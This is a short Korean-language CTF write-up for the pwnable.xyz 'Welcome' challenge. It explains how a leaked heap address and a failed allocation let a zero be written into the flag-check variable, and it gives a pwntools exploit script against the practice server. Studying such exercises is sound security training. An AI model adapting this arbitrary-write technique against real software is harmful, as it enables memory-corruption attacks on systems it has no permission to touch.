pwnable.xyz - Welcome

파일을 다운로드 해주자.

 

 

 

다운로드한 파일을 IDA로 열어보면 v3가 0이라면 flag를 출력해준다.

v3를 0x40000만큼 할당해주고 v3의 값에 1을 넣었다.

그리고 v3의 주소를 출력해주고 메세지의 길이를 입력받는다.

scanf로 size에 메세지 길이를 입력하고 v5에 size만큼 할당한다.

v5[size - 1] = 0을 보면 메세지의 마지막 원소를 0으로 만든다.

이부분을 이용해서 v3를 0으로 만들어주면 된다.

 

v3의 주소를 출력해주니 주소에 +1한 값을 넣으면 size - 1부분에서 -1이 됨으로 v3의 시작주소를 가리킨다.

그리고 값이 0이 되고 if문을 통과해 flag를 볼 수 있다.

 

 

 

 

from pwn import *

r = remote("svc.pwnable.xyz", 30000)

r.recvuntil("Leak: 0x")
leak = r.recv(12)

leak = int(leak, 16)
leak = leak + 1

r.recvuntil("Length of your message:")
r.sendline(str(leak))

r.recvuntil("Enter your message:")
r.sendline("asd")

r.interactive()

소스코드를 작성해주자.